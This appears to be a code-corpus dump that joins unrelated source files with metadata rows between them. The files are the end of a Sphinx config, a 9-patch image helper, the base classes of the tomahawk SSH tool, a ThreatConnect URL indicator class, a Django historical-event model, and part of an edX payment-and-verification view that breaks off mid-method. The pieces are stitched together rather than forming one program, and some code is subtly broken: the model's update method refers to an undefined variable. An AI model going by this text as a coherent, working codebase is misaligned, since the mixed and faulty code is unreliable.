#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'lazyscraper',
u'lazyscraper documentation',
[u'Ivan Begtin'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'lazyscraper',
u'lazyscraper documentation',
u'Ivan Begtin',
'lazyscraper',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# sphinx.ext.intersphinx confs
intersphinx_mapping = {'python': ('https://docs.python.org/2', None)}
|
apache-2.0
| -2,493,372,146,225,627,600
| 29.693141
| 84
| 0.705834
| false
| 3.728947
| true
| false
| false
|
cheery/essence
|
essence2/graphics/patch9.py
|
1
|
1727
|
from surface import Surface
def borders(surface):
width, height = surface.size
y0 = 0
y1 = 0
x0 = 0
x1 = 0
i = 0
while i < height:
r,g,b,a = surface.at((0,i))
if a > 0:
y0 = i
break
i += 1
while i < height:
r,g,b,a = surface.at((0,i))
if a == 0:
y1 = i
break
i += 1
i = 0
while i < width:
r,g,b,a = surface.at((i,0))
if a > 0:
x0 = i
break
i += 1
while i < width:
r,g,b,a = surface.at((i,0))
if a == 0:
x1 = i
break
i += 1
return [1, x0, x1, width], [1, y0, y1, height]
class Patch9(object):
def __init__(self, surface):
self.surface = surface
self.subsurfaces = []
h, v = borders(surface)
for y in range(3):
row = []
for x in range(3):
area = (h[x], v[y]), (h[x+1]-h[x], v[y+1]-v[y])
row.append(surface.subsurface(area))
self.subsurfaces.append(row)
self.padding = h[1]-h[0], v[1]-v[0], h[3]-h[2], v[3]-v[2]
@staticmethod
def load(path):
return Patch9(Surface.load(path))
def comm_duck(self, target, ((x,y), (w,h))):
area = x,y,w,h
left, top, right, bottom = self.padding
h0, v0 = area[0], area[1]
h3, v3 = area[2] + h0, area[3] + v0
h = [h0, h0+left, h3-right, h3]
v = [v0, v0+top, v3-bottom, v3]
for y, row in enumerate(self.subsurfaces):
for x, surface in enumerate(row):
sector = (h[x], v[y]), (h[x+1]-h[x], v[y+1]-v[y])
target(surface, sector)
|
gpl-3.0
| -2,912,530,288,493,200,000
| 25.984375
| 65
| 0.437174
| false
| 2.922166
| false
| false
| false
|
oinume/tomahawk
|
tomahawk/base.py
|
1
|
13671
|
# -*- coding: utf-8 -*-
import multiprocessing
import os
import re
import platform
from six import print_
import six
import string
import sys
from tomahawk import (
__version__,
TimeoutError,
)
from tomahawk.color import (
create_coloring_object
)
from tomahawk.constants import (
DEFAULT_TIMEOUT,
DEFAULT_COMMAND_OUTPUT_FORMAT,
DEFAULT_EXPECT_DELAY,
DEFAULT_EXPECT_ENCODING,
OUTPUT_FORMAT_CONTROLL_CHARS,
)
from tomahawk.log import create_logger
from tomahawk.utils import (
check_hosts,
get_options_from_conf,
read_login_password,
read_login_password_from_stdin,
read_sudo_password,
read_sudo_password_from_stdin
)
class BaseContext(object):
def __init__(self, options = {}, out = sys.stdout, err = sys.stderr):
self.options = options
self.out = out
self.err = err
self.arguments, self.source, self.destination = None, None, None
class BaseMain(object):
def __init__(self, script_path):
self.script_path = script_path
self.arg_parser = self.create_argument_parser(script_path)
self.options = self.arg_parser.parse_args(sys.argv[1:])
conf_options = None
if self.options.conf:
conf_options = get_options_from_conf(
os.path.basename(script_path),
self.options.conf
)
args = conf_options + sys.argv[1:]
# Re-parse command line options because conf_options added
self.options = self.arg_parser.parse_args(args)
self.log = create_logger(
None,
self.options.debug or self.options.deep_debug,
self.options.deep_debug
)
if conf_options:
self.log.debug("Applying options %s from %s" % (str(conf_options), self.options.conf))
def run(self):
try:
if self.options.profile:
file = '%s.prof.%d' % (os.path.basename(self.script_path), os.getpid())
cProfile = __import__('cProfile')
pstats = __import__('pstats')
cProfile.runctx("self.do_run()", globals(), locals(), file)
p = pstats.Stats(file)
p.strip_dirs()
p.sort_stats('time', 'calls')
p.print_stats()
return 0 # TODO: return exit status
else:
return self.do_run()
except KeyboardInterrupt:
print_()
print_('Keyboard interrupt. exiting...')
def do_run(self):
raise Exception("This is a template method implemented by sub-class")
def check_hosts(self):
return check_hosts(self.options.__dict__, self.log, self.arg_parser.format_usage)
def confirm_execution_on_production(self, message):
if os.environ.get('TOMAHAWK_ENV') != 'production':
return
input = raw_input(message)
if input == 'yes':
print_()
else:
print_('Command execution was cancelled.')
sys.exit(0)
@classmethod
def add_common_arguments(cls, parser):
parser.add_argument(
'-h', '--hosts', metavar='HOSTS',
help='DUPLICATED. Use -H. (Will be deleted in v0.8.0)',
)
parser.add_argument(
'-H', '--hosts', metavar='HOSTS',
help='Host names for sending commands. (splited with ",")',
)
parser.add_argument(
'-f', '--hosts-files', metavar='HOSTS_FILES',
help='Hosts files which listed host names. (splited with ",")'
)
parser.add_argument(
'-c', '--continue-on-error', action='store_true', default=None,
help='Command exectuion continues whatever any errors.'
)
parser.add_argument(
'-p', '--parallel', metavar='NUM', type=int, default=1,
help='Process numbers for parallel command execution. (default: 1)'
)
parser.add_argument(
'-l', '--prompt-login-password', action='store_true',
help='Prompt a password for ssh authentication.'
)
parser.add_argument(
'--login-password-stdin', action='store_true',
help='Read a password for ssh authentication from stdin.'
)
parser.add_argument(
'-t', '--timeout', metavar='SECONDS', type=int, default=DEFAULT_TIMEOUT,
help='Specify expect timeout in seconds. (default: %d)' % (DEFAULT_TIMEOUT)
)
parser.add_argument(
'--expect-encoding', metavar='ENCODING', default=DEFAULT_EXPECT_ENCODING,
help='Expect encoding for password prompt. (default: %s)' % (DEFAULT_EXPECT_ENCODING)
)
parser.add_argument(
'-d', '--delay', type=int, default=0,
help='Command delay time in seconds. (default: 0)'
)
parser.add_argument(
'--expect-delay', type=float, default=DEFAULT_EXPECT_DELAY,
help='Expect delay time in seconds. (default: 0.05)'
)
parser.add_argument(
'-C', '--conf', metavar='FILE', default=None,
help='Configuration file path.'
)
parser.add_argument(
'-D', '--debug', action='store_true', default=False,
help='Enable debug output.',
)
parser.add_argument(
'--deep-debug', action='store_true', default=False,
help='Enable deeper debug output.',
)
parser.add_argument(
'--profile', action='store_true', help='Enable profiling.'
)
parser.add_argument(
'--version', action='version',
version='%(prog)s ' + __version__
+ ' with Python ' + '.'.join(map(str, sys.version_info[0:3]))
+ ' (' + platform.platform() + ')'
)
return parser
class BaseExecutor(object):
"""
A base class for CommandExecutor, RsyncExecutor
"""
def __init__(self, context, log, hosts=[], **kwargs):
"""
Constructor
Args:
context -- context
log -- log
hosts -- target hosts
"""
self.processes_terminated = False
if context is None:
raise RuntimeError('Argument "context" required.')
if len(hosts) == 0:
raise RuntimeError('Argument "hosts" length must be > 0')
options = context.options
newline = False
login_password = None
if 'login_password' in kwargs:
login_password = kwargs['login_password']
elif options.get('prompt_login_password'):
login_password = read_login_password()
newline = True
elif options.get('login_password_stdin'):
login_password = read_login_password_from_stdin()
sudo_password = None
if 'sudo_password' in kwargs:
sudo_password = kwargs['sudo_password']
elif options.get('prompt_sudo_password'):
sudo_password = read_sudo_password()
elif options.get('sudo_password_stdin'):
sudo_password = read_sudo_password_from_stdin()
if newline:
print_()
self.context = context
self.log = log
self.hosts = hosts
self.login_password = login_password
self.sudo_password = sudo_password
self.raise_error = True
if options.get('continue_on_error'):
self.raise_error = False
self.process_pool = multiprocessing.Pool(processes = options.get('parallel', 1))
def process_async_results(
self,
async_results,
create_output,
create_timeout_message,
create_timeout_raise_error_message,
create_failure_message,
create_failure_raise_error_message,
create_failure_last_message,
):
out, err = self.context.out, self.context.err
color = create_coloring_object(out)
options = self.context.options
hosts_count = len(self.hosts)
finished = 0
error_hosts_count = 0
output_format = self.output_format(options.get('output_format', DEFAULT_COMMAND_OUTPUT_FORMAT))
if six.PY2:
output_format = output_format.decode(DEFAULT_EXPECT_ENCODING)
output_format_template = string.Template(output_format)
timeout = options.get('timeout', DEFAULT_TIMEOUT)
error_prefix = color.red(color.bold('[error]')) # insert newline for error messages
execution_info = {}
# Main loop continues until all processes are done
while finished < hosts_count:
for dict in async_results:
host = dict['host']
command = dict['command']
async_result = dict['async_result']
if not async_result.ready():
continue
exit_status = 1
command_output = ''
timeout_detail = None
try:
exit_status, command_output = async_result.get(timeout = timeout)
self.log.debug("host = %s, exit_status = %d" % (host, exit_status))
except (TimeoutError, multiprocessing.TimeoutError):
error = sys.exc_info()[1]
timeout_detail = str(error)
execution_info[host] = { 'timeout': 1 }
async_results.remove(dict)
finished += 1
output = create_output(color, output_format_template, command, host, exit_status, command_output)
execution_info[host] = {
'exit_status': exit_status,
'command_output': command_output,
'timeout': False,
}
if command_output == '':
# if command_output is empty, chomp last newline character for ugly output
output = re.sub(os.linesep + r'\Z', '', output)
if exit_status == 0:
if six.PY2:
output = output.encode(DEFAULT_EXPECT_ENCODING)
print_(output, file=out)
elif timeout_detail is not None:
print_('%s %s\n' % (
error_prefix,
create_timeout_message(color, output, timeout)
), file=out)
execution_info[host]['timeout'] = True
error_hosts_count += 1
if self.raise_error:
print_('%s %s\n' % (
error_prefix,
create_timeout_raise_error_message(color, command, host, timeout)
), file=err)
return 1
else:
print_('%s %s\n' % (
error_prefix,
create_failure_message(color, output, exit_status)
), file=out)
error_hosts_count += 1
if self.raise_error:
print_('%s %s' % (
error_prefix,
create_failure_raise_error_message(color, command, host)
), file=err)
return 1
# Free process pool
self.terminate_processes()
if error_hosts_count > 0:
hosts = ''
for h in self.hosts:
if execution_info[h]['exit_status'] != 0:
hosts += ' %s\n' % (h)
hosts = hosts.rstrip()
print_('%s %s' % (
error_prefix,
create_failure_last_message(color, command, hosts)
), file=err)
return 1
if options.get('verify_output'):
has_different_output = False
prev_output = None
hosts = ''
for h in self.hosts:
output = execution_info[h]['command_output']
self.log.debug("host: '%s', prev_output: '%s', output = '%s'" % (h, prev_output, output))
if prev_output != None and output != prev_output:
hosts += ' %s\n' % (h)
has_different_output = True
prev_output = output
hosts = hosts.rstrip()
if has_different_output:
print_("%s Detected different command output on following hosts.\n%s" \
% (color.red(error_prefix), hosts), file=err)
return 3
else:
print_(color.green('Verified output of all hosts.'), file=out)
return 0
def output_format(self, format):
seq = []
prev, prev_prev = None, None
for char in format:
controll_char = OUTPUT_FORMAT_CONTROLL_CHARS.get(char)
if controll_char and prev == '\\' and prev_prev == '\\':
pass
elif controll_char and prev == '\\':
seq.pop(len(seq) - 1)
seq.append(controll_char)
prev_prev = prev
prev = char
continue
seq.append(char)
prev_prev = prev
prev = char
return ''.join(seq)
def terminate_processes(self):
if hasattr(self, 'process_pool') and not self.processes_terminated:
#self.process_pool.close()
self.log.debug("terminating processes")
self.process_pool.terminate()
self.process_pool.join()
self.processes_terminated = True
def __del__(self):
self.terminate_processes()
|
lgpl-2.1
| 3,294,858,065,523,848,700
| 35.849057
| 113
| 0.526443
| false
| 4.383136
| false
| false
| false
|
ThreatConnect-Inc/tcex
|
tcex/threat_intelligence/mappings/indicator/indicator_types/url.py
|
1
|
1845
|
"""ThreatConnect TI URL"""
# standard library
from urllib.parse import quote_plus
from ..indicator import Indicator
class URL(Indicator):
"""Unique API calls for URL API Endpoints"""
def __init__(self, ti: 'ThreatIntelligenc', **kwargs):
"""Initialize Class Properties.
Args:
text (str, kwargs): [Required for Create] The URL value for this Indicator.
active (bool, kwargs): If False the indicator is marked "inactive" in TC.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): [Read-Only] The date timestamp the Indicator was created.
last_modified (str, kwargs): [Read-Only] The date timestamp the Indicator was last
modified.
private_flag (bool, kwargs): If True the indicator is marked as private in TC.
rating (str, kwargs): The threat rating for this Indicator.
xid (str, kwargs): The external id for this Indicator.
"""
super().__init__(ti, sub_type='URL', api_entity='url', api_branch='urls', **kwargs)
self.unique_id = kwargs.get('unique_id', kwargs.get('text'))
self.data['text'] = self.unique_id
if self.unique_id:
self.unique_id = quote_plus(self.fully_decode_uri(self.unique_id))
def can_create(self):
"""Return True if address can be created.
If the text has been provided returns that the URL can be created, otherwise
returns that the URL cannot be created.
"""
return not self.data.get('text') is None
def _set_unique_id(self, json_response):
"""Set the unique_id provided a json response.
Args:
json_response:
"""
self.unique_id = quote_plus(self.fully_decode_uri(json_response.get('text', '')))
|
apache-2.0
| -6,489,890,639,290,726,000
| 40
| 95
| 0.62168
| false
| 4.002169
| false
| false
| false
|
MenschMarcus/master_HistoGlobe
|
HistoGlobe_server/models/Hivent.py
|
1
|
4233
|
# ==============================================================================
# Hivent represents a significant historical happening (historical event).
# It is the only representation of the temporal dimension in the data model
# and therefore the main organisational dimension.
# An Hivent may contain one or many EditOperations to the areas of the world.
#
# ------------------------------------------------------------------------------
# Hivent 1:n EditOperation
#
# ==============================================================================
from django.db import models
from django.utils import timezone
from django.contrib import gis
from djgeojson.fields import *
from django.forms.models import model_to_dict
# ------------------------------------------------------------------------------
class Hivent(models.Model):
name = models.CharField (max_length=150, default='')
date = models.DateTimeField (default=timezone.now)
location = models.CharField (null=True, max_length=150)
description = models.CharField (null=True, max_length=1000)
link = models.CharField (null=True, max_length=300)
# ============================================================================
def __unicode__(self):
return self.name
# ============================================================================
# givent set of validated (!) hivent data, update the Hivent properties
# ============================================================================
def update(self, hivent_data):
## save in database
self.name = hivent_data['name'] # CharField
self.date = hivent_data['date'] # DateTimeField
self.location = hivent_data['location'] # CharField
self.description = hivent_data['description'] # CharField
self.link = hivent_data['link'] # CharField
hivent.save()
return hivent
# ============================================================================
# return Hivent with all its associated Changes
# ============================================================================
def prepare_output(self):
from HistoGlobe_server.models import EditOperation, HiventOperation, OldArea, NewArea, UpdateArea
from HistoGlobe_server import utils
import chromelogger as console
# get original Hivent with all properties
# -> except for change
hivent = model_to_dict(self)
# get all EditOperations associated to the Hivent
hivent['edit_operations'] = []
for edit_operation_model in EditOperation.objects.filter(hivent=self):
edit_operation = model_to_dict(edit_operation_model)
# get all HiventOperations associated to the EditOperation
edit_operation['hivent_operations'] = []
for hivent_operation_model in HiventOperation.objects.filter(edit_operation=edit_operation_model):
hivent_operation = model_to_dict(hivent_operation_model)
# get all OldAreas, NewAreas and UpdateArea associated to the HiventOperation
hivent_operation['old_areas'] = []
hivent_operation['new_areas'] = []
hivent_operation['update_area'] = None
for old_area_model in OldArea.objects.filter(hivent_operation=hivent_operation_model):
hivent_operation['old_areas'].append(model_to_dict(old_area_model))
for new_area_model in NewArea.objects.filter(hivent_operation=hivent_operation_model):
hivent_operation['new_areas'].append(model_to_dict(new_area_model))
for update_area_model in UpdateArea.objects.filter(hivent_operation=hivent_operation_model):
hivent_operation['update_area'] = model_to_dict(update_area_model)
edit_operation['hivent_operations'].append(hivent_operation)
hivent['edit_operations'].append(edit_operation)
# prepare date for output
hivent['date'] = utils.get_date_string(hivent['date'])
return hivent
# ============================================================================
class Meta:
ordering = ['-date'] # descending order (2000 -> 0 -> -2000 -> ...)
app_label = 'HistoGlobe_server'
|
gpl-2.0
| -4,437,588,823,208,093,000
| 41.33
| 104
| 0.550201
| false
| 4.581169
| false
| false
| false
|
proversity-org/edx-platform
|
lms/djangoapps/verify_student/views.py
|
1
|
49530
|
"""
Views for the verification flow
"""
import datetime
import decimal
import json
import logging
import urllib
import analytics
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.contrib.staticfiles.storage import staticfiles_storage
from django.core.mail import send_mail
from django.core.urlresolvers import reverse
from django.db import transaction
from django.http import Http404, HttpResponse, HttpResponseBadRequest
from django.shortcuts import redirect
from django.utils.decorators import method_decorator
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_lazy
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from django.views.generic.base import View
from edx_rest_api_client.exceptions import SlumberBaseException
from eventtracking import tracker
from ipware.ip import get_ip
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from pytz import UTC
from course_modes.models import CourseMode
from edxmako.shortcuts import render_to_response, render_to_string
from lms.djangoapps.commerce.utils import EcommerceService, is_account_activation_requirement_disabled
from lms.djangoapps.verify_student.image import InvalidImageData, decode_image_data
from lms.djangoapps.verify_student.models import SoftwareSecurePhotoVerification, VerificationDeadline, get_verify_student_settings
from lms.djangoapps.verify_student.ssencrypt import has_valid_signature
from openedx.core.djangoapps.commerce.utils import ecommerce_api_client
from openedx.core.djangoapps.embargo import api as embargo_api
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from openedx.core.djangoapps.user_api.accounts import NAME_MIN_LENGTH
from openedx.core.djangoapps.user_api.accounts.api import update_account_settings
from openedx.core.djangoapps.user_api.errors import AccountValidationError, UserNotFound
from openedx.core.lib.log_utils import audit_log
from shoppingcart.models import CertificateItem, Order
from shoppingcart.processors import get_purchase_endpoint, get_signed_purchase_params
from student.models import CourseEnrollment
from util.db import outer_atomic
from util.json_request import JsonResponse
from xmodule.modulestore.django import modulestore
log = logging.getLogger(__name__)
class PayAndVerifyView(View):
"""
View for the "verify and pay" flow.
This view is somewhat complicated, because the user
can enter it from a number of different places:
* From the "choose your track" page.
* After completing payment.
* From the dashboard in order to complete verification.
* From the dashboard in order to upgrade to a verified track.
The page will display different steps and requirements
depending on:
* Whether the user has submitted a photo verification recently.
* Whether the user has paid for the course.
* How the user reached the page (mostly affects messaging)
We are also super-paranoid about how users reach this page.
If they somehow aren't enrolled, or the course doesn't exist,
or they've unenrolled, or they've already paid/verified,
... then we try to redirect them to the page with the
most appropriate messaging (including the dashboard).
Note that this page does NOT handle re-verification
(photo verification that was denied or had an error);
that is handled by the "reverify" view.
"""
# Step definitions
#
# These represent the numbered steps a user sees in
# the verify / payment flow.
#
# Steps can either be:
# - displayed or hidden
# - complete or incomplete
#
# For example, when a user enters the verification/payment
# flow for the first time, the user will see steps
# for both payment and verification. As the user
# completes these steps (for example, submitting a photo)
# the steps will be marked "complete".
#
# If a user has already verified for another course,
# then the verification steps will be hidden,
# since the user has already completed them.
#
# If a user re-enters the flow from another application
# (for example, after completing payment through
# a third-party payment processor), then the user
# will resume the flow at an intermediate step.
#
INTRO_STEP = 'intro-step'
MAKE_PAYMENT_STEP = 'make-payment-step'
PAYMENT_CONFIRMATION_STEP = 'payment-confirmation-step'
FACE_PHOTO_STEP = 'face-photo-step'
ID_PHOTO_STEP = 'id-photo-step'
REVIEW_PHOTOS_STEP = 'review-photos-step'
ENROLLMENT_CONFIRMATION_STEP = 'enrollment-confirmation-step'
ALL_STEPS = [
INTRO_STEP,
MAKE_PAYMENT_STEP,
PAYMENT_CONFIRMATION_STEP,
FACE_PHOTO_STEP,
ID_PHOTO_STEP,
REVIEW_PHOTOS_STEP,
ENROLLMENT_CONFIRMATION_STEP
]
PAYMENT_STEPS = [
MAKE_PAYMENT_STEP,
PAYMENT_CONFIRMATION_STEP
]
VERIFICATION_STEPS = [
FACE_PHOTO_STEP,
ID_PHOTO_STEP,
REVIEW_PHOTOS_STEP,
ENROLLMENT_CONFIRMATION_STEP
]
# These steps can be skipped using the ?skip-first-step GET param
SKIP_STEPS = [
INTRO_STEP,
]
STEP_TITLES = {
INTRO_STEP: ugettext_lazy("Intro"),
MAKE_PAYMENT_STEP: ugettext_lazy("Make payment"),
PAYMENT_CONFIRMATION_STEP: ugettext_lazy("Payment confirmation"),
FACE_PHOTO_STEP: ugettext_lazy("Take photo"),
ID_PHOTO_STEP: ugettext_lazy("Take a photo of your ID"),
REVIEW_PHOTOS_STEP: ugettext_lazy("Review your info"),
ENROLLMENT_CONFIRMATION_STEP: ugettext_lazy("Enrollment confirmation"),
}
# Messages
#
# Depending on how the user entered reached the page,
# we will display different text messaging.
# For example, we show users who are upgrading
# slightly different copy than users who are verifying
# for the first time.
#
FIRST_TIME_VERIFY_MSG = 'first-time-verify'
VERIFY_NOW_MSG = 'verify-now'
VERIFY_LATER_MSG = 'verify-later'
UPGRADE_MSG = 'upgrade'
PAYMENT_CONFIRMATION_MSG = 'payment-confirmation'
# Requirements
#
# These explain to the user what he or she
# will need to successfully pay and/or verify.
#
# These are determined by the steps displayed
# to the user; for example, if the user does not
# need to complete the verification steps,
# then the photo ID and webcam requirements are hidden.
#
ACCOUNT_ACTIVATION_REQ = "account-activation-required"
PHOTO_ID_REQ = "photo-id-required"
WEBCAM_REQ = "webcam-required"
STEP_REQUIREMENTS = {
ID_PHOTO_STEP: [PHOTO_ID_REQ, WEBCAM_REQ],
FACE_PHOTO_STEP: [WEBCAM_REQ],
}
# Deadline types
VERIFICATION_DEADLINE = "verification"
UPGRADE_DEADLINE = "upgrade"
def _get_user_active_status(self, user):
"""
Returns the user's active status to the caller
Overrides the actual value if account activation has been disabled via waffle switch
Arguments:
user (User): Current user involved in the onboarding/verification flow
"""
return user.is_active or is_account_activation_requirement_disabled()
@method_decorator(login_required)
def get(
self, request, course_id,
always_show_payment=False,
current_step=None,
message=FIRST_TIME_VERIFY_MSG
):
"""
Render the payment and verification flow.
Arguments:
request (HttpRequest): The request object.
course_id (unicode): The ID of the course the user is trying
to enroll in.
Keyword Arguments:
always_show_payment (bool): If True, show the payment steps
even if the user has already paid. This is useful
for users returning to the flow after paying.
current_step (string): The current step in the flow.
message (string): The messaging to display.
Returns:
HttpResponse
Raises:
Http404: The course does not exist or does not
have a verified mode.
"""
# Parse the course key
# The URL regex should guarantee that the key format is valid.
course_key = CourseKey.from_string(course_id)
course = modulestore().get_course(course_key)
# Verify that the course exists
if course is None:
log.warn(u"Could not find course with ID %s.", course_id)
raise Http404
# Check whether the user has access to this course
# based on country access rules.
redirect_url = embargo_api.redirect_if_blocked(
course_key,
user=request.user,
ip_address=get_ip(request),
url=request.path
)
if redirect_url:
return redirect(redirect_url)
# If the verification deadline has passed
# then show the user a message that he/she can't verify.
#
# We're making the assumptions (enforced in Django admin) that:
#
# 1) Only verified modes have verification deadlines.
#
# 2) If set, verification deadlines are always AFTER upgrade deadlines, because why would you
# let someone upgrade into a verified track if they can't complete verification?
#
verification_deadline = VerificationDeadline.deadline_for_course(course.id)
response = self._response_if_deadline_passed(course, self.VERIFICATION_DEADLINE, verification_deadline)
if response is not None:
log.info(u"Verification deadline for '%s' has passed.", course.id)
return response
# Retrieve the relevant course mode for the payment/verification flow.
#
# WARNING: this is technical debt! A much better way to do this would be to
# separate out the payment flow and use the product SKU to figure out what
# the user is trying to purchase.
#
# Nonetheless, for the time being we continue to make the really ugly assumption
# that at some point there was a paid course mode we can query for the price.
relevant_course_mode = self._get_paid_mode(course_key)
# If we can find a relevant course mode, then log that we're entering the flow
# Otherwise, this course does not support payment/verification, so respond with a 404.
if relevant_course_mode is not None:
if CourseMode.is_verified_mode(relevant_course_mode):
log.info(
u"Entering payment and verification flow for user '%s', course '%s', with current step '%s'.",
request.user.id, course_id, current_step
)
else:
log.info(
u"Entering payment flow for user '%s', course '%s', with current step '%s'",
request.user.id, course_id, current_step
)
else:
# Otherwise, there has never been a verified/paid mode,
# so return a page not found response.
log.warn(
u"No paid/verified course mode found for course '%s' for verification/payment flow request",
course_id
)
raise Http404
# If the user is trying to *pay* and the upgrade deadline has passed,
# then they shouldn't be able to enter the flow.
#
# NOTE: This should match the availability dates used by the E-Commerce service
# to determine whether a user can purchase a product. The idea is that if the service
# won't fulfill the order, we shouldn't even let the user get into the payment flow.
#
user_is_trying_to_pay = message in [self.FIRST_TIME_VERIFY_MSG, self.UPGRADE_MSG]
if user_is_trying_to_pay:
upgrade_deadline = relevant_course_mode.expiration_datetime
response = self._response_if_deadline_passed(course, self.UPGRADE_DEADLINE, upgrade_deadline)
if response is not None:
log.info(u"Upgrade deadline for '%s' has passed.", course.id)
return response
# Check whether the user has verified, paid, and enrolled.
# A user is considered "paid" if he or she has an enrollment
# with a paid course mode (such as "verified").
# For this reason, every paid user is enrolled, but not
# every enrolled user is paid.
# If the course mode is not verified(i.e only paid) then already_verified is always True
already_verified = (
self._check_already_verified(request.user)
if CourseMode.is_verified_mode(relevant_course_mode)
else True
)
already_paid, is_enrolled = self._check_enrollment(request.user, course_key)
# Redirect the user to a more appropriate page if the
# messaging won't make sense based on the user's
# enrollment / payment / verification status.
sku_to_use = relevant_course_mode.sku
purchase_workflow = request.GET.get('purchase_workflow', 'single')
if purchase_workflow == 'bulk' and relevant_course_mode.bulk_sku:
sku_to_use = relevant_course_mode.bulk_sku
redirect_response = self._redirect_if_necessary(
message,
already_verified,
already_paid,
is_enrolled,
course_key,
user_is_trying_to_pay,
request.user,
sku_to_use
)
if redirect_response is not None:
return redirect_response
display_steps = self._display_steps(
always_show_payment,
already_verified,
already_paid,
relevant_course_mode
)
# Override the actual value if account activation has been disabled
# Also see the reference to this parameter in context dictionary further down
user_is_active = self._get_user_active_status(request.user)
requirements = self._requirements(display_steps, user_is_active)
if current_step is None:
current_step = display_steps[0]['name']
# Allow the caller to skip the first page
# This is useful if we want the user to be able to
# use the "back" button to return to the previous step.
# This parameter should only work for known skip-able steps
if request.GET.get('skip-first-step') and current_step in self.SKIP_STEPS:
display_step_names = [step['name'] for step in display_steps]
current_step_idx = display_step_names.index(current_step)
if (current_step_idx + 1) < len(display_steps):
current_step = display_steps[current_step_idx + 1]['name']
courseware_url = ""
if not course.start or course.start < datetime.datetime.today().replace(tzinfo=UTC):
courseware_url = reverse(
'course_root',
kwargs={'course_id': unicode(course_key)}
)
full_name = (
request.user.profile.name
if request.user.profile.name
else ""
)
# If the user set a contribution amount on another page,
# use that amount to pre-fill the price selection form.
contribution_amount = request.session.get(
'donation_for_course', {}
).get(unicode(course_key), '')
# Remember whether the user is upgrading
# so we can fire an analytics event upon payment.
request.session['attempting_upgrade'] = (message == self.UPGRADE_MSG)
# Determine the photo verification status
verification_good_until = self._verification_valid_until(request.user)
# get available payment processors
if relevant_course_mode.sku:
try:
processors = ecommerce_api_client(request.user).payment.processors.get()
except Exception as e:
log.info(str(e))
processors = ["cybersource","paypal","stripe"]
else:
# transaction will be conducted using legacy shopping cart
processors = [settings.CC_PROCESSOR_NAME]
default_currency = configuration_helpers.get_value('PAID_COURSE_REGISTRATION_CURRENCY', settings.PAID_COURSE_REGISTRATION_CURRENCY) or ['usd', '$']
# Render the top-level page
context = {
'contribution_amount': contribution_amount,
'course': course,
'course_key': unicode(course_key),
'checkpoint_location': request.GET.get('checkpoint'),
'course_mode': relevant_course_mode,
'default_currency': default_currency,
'courseware_url': courseware_url,
'current_step': current_step,
'disable_courseware_js': True,
'display_steps': display_steps,
'is_active': json.dumps(user_is_active),
'user_email': request.user.email,
'message_key': message,
'platform_name': configuration_helpers.get_value('PLATFORM_NAME', settings.PLATFORM_NAME),
'processors': processors,
'requirements': requirements,
'user_full_name': full_name,
'verification_deadline': verification_deadline or "",
'already_verified': already_verified,
'verification_good_until': verification_good_until,
'capture_sound': staticfiles_storage.url("audio/camera_capture.wav"),
'nav_hidden': True,
'is_ab_testing': 'begin-flow' in request.path,
}
return render_to_response("verify_student/pay_and_verify.html", context)
def add_utm_params_to_url(self, url):
# utm_params is [(u'utm_content', u'course-v1:IDBx IDB20.1x 1T2017'),...
utm_params = [item for item in self.request.GET.items() if 'utm_' in item[0]]
# utm_params is utm_content=course-v1%3AIDBx+IDB20.1x+1T2017&...
utm_params = urllib.urlencode(utm_params, True)
# utm_params is utm_content=course-v1:IDBx+IDB20.1x+1T2017&...
# (course-keys do not have url encoding)
utm_params = urllib.unquote(utm_params)
if utm_params:
if '?' in url:
url = url + '&' + utm_params
else:
url = url + '?' + utm_params
return url
def _redirect_if_necessary(
self, message, already_verified, already_paid, is_enrolled, course_key, # pylint: disable=bad-continuation
user_is_trying_to_pay, user, sku # pylint: disable=bad-continuation
):
"""Redirect the user to a more appropriate page if necessary.
In some cases, a user may visit this page with
verification / enrollment / payment state that
we don't anticipate. For example, a user may unenroll
from the course after paying for it, then visit the
"verify now" page to complete verification.
When this happens, we try to redirect the user to
the most appropriate page.
Arguments:
message (string): The messaging of the page. Should be a key
in `MESSAGES`.
already_verified (bool): Whether the user has submitted
a verification request recently.
already_paid (bool): Whether the user is enrolled in a paid
course mode.
is_enrolled (bool): Whether the user has an active enrollment
in the course.
course_key (CourseKey): The key for the course.
Returns:
HttpResponse or None
"""
url = None
course_kwargs = {'course_id': unicode(course_key)}
if already_verified and already_paid:
# If they've already paid and verified, there's nothing else to do,
# so redirect them to the dashboard.
if message != self.PAYMENT_CONFIRMATION_MSG:
url = reverse('dashboard')
elif message in [self.VERIFY_NOW_MSG, self.VERIFY_LATER_MSG, self.PAYMENT_CONFIRMATION_MSG]:
if is_enrolled:
# If the user is already enrolled but hasn't yet paid,
# then the "upgrade" messaging is more appropriate.
if not already_paid:
url = reverse('verify_student_upgrade_and_verify', kwargs=course_kwargs)
else:
# If the user is NOT enrolled, then send him/her
# to the first time verification page.
url = reverse('verify_student_start_flow', kwargs=course_kwargs)
elif message == self.UPGRADE_MSG:
if is_enrolled:
if already_paid:
# If the student has paid, but not verified, redirect to the verification flow.
url = reverse('verify_student_verify_now', kwargs=course_kwargs)
else:
url = reverse('verify_student_start_flow', kwargs=course_kwargs)
if user_is_trying_to_pay and self._get_user_active_status(user) and not already_paid:
# If the user is trying to pay, has activated their account, and the ecommerce service
# is enabled redirect him to the ecommerce checkout page.
ecommerce_service = EcommerceService()
if ecommerce_service.is_enabled(user):
url = ecommerce_service.get_checkout_page_url(sku)
# Redirect if necessary, otherwise implicitly return None
